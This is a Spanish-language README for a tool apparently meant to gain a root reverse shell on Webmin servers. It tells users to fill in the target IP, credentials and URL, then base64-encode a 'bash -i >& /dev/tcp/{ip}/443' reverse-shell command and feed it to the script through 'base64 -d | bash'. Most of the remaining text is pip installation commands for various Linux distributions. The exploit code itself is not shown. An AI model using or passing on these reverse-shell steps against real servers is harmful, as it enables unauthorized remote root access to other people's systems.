	REVERSHELL-ROOT_WEBMIN
-----creado por dh89------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Recuerda cambiar lo parametor globales tales como:
-La ip
-EL usuario y la contaseña
-El puerto (recomendable no cambiar)
-La url de la pagina web, en todos los campos requeridos
-La data enviada por post, puedes ejecutar este comando, 'echo "bash -i >& /dev/tcp/{ip}/443 0>&1 | base64"'
luego remplazar en el .py en esta linea: 
"echo {pegar el resultado del comando de arriba} | base64 -d | bash"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------
	Si no funciona, probablemente te falte la libreria "pwn", la puedes instalar con este comando: "pip install pwn". Si no tienes "pip", depende de que sistema
operativo estes utilizando (Instalar para Phyton3):

------------Para instalar pip en Ubuntu, Debian, y Linux Mint:
$ sudo apt install python3-pip	#comando para Python3
$ sudo apt install python-pip	#comando para Python2

------------Para instalar en CentOS, Fedora, y Red Hat:
$ sudo dnf install python3	#comando para Python 3
$ sudo dnf install python-pip	#comando para Python 2

------------Para instalar pip en CentOS 6 and 7, y versiones viejas de Red Hat:
$ sudo yum install epel-release
$ sudo yum install python-pip
------------Para instalar pip en Arch Linux y Manjaro:

$ sudo pacman -S python-pip		#comando para Python3
$ sudo pacman -S python2-pip		#comando para Python2

------------Instalar pip en OpenSUSE:
$ sudo zypper install python3-pip	#comando para Python3
$ sudo zypper install python-pip	#comando para Python2
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
	Si se presenta algun otro fallo lo puedes comunicar en mi github: https://github.com/dh8989
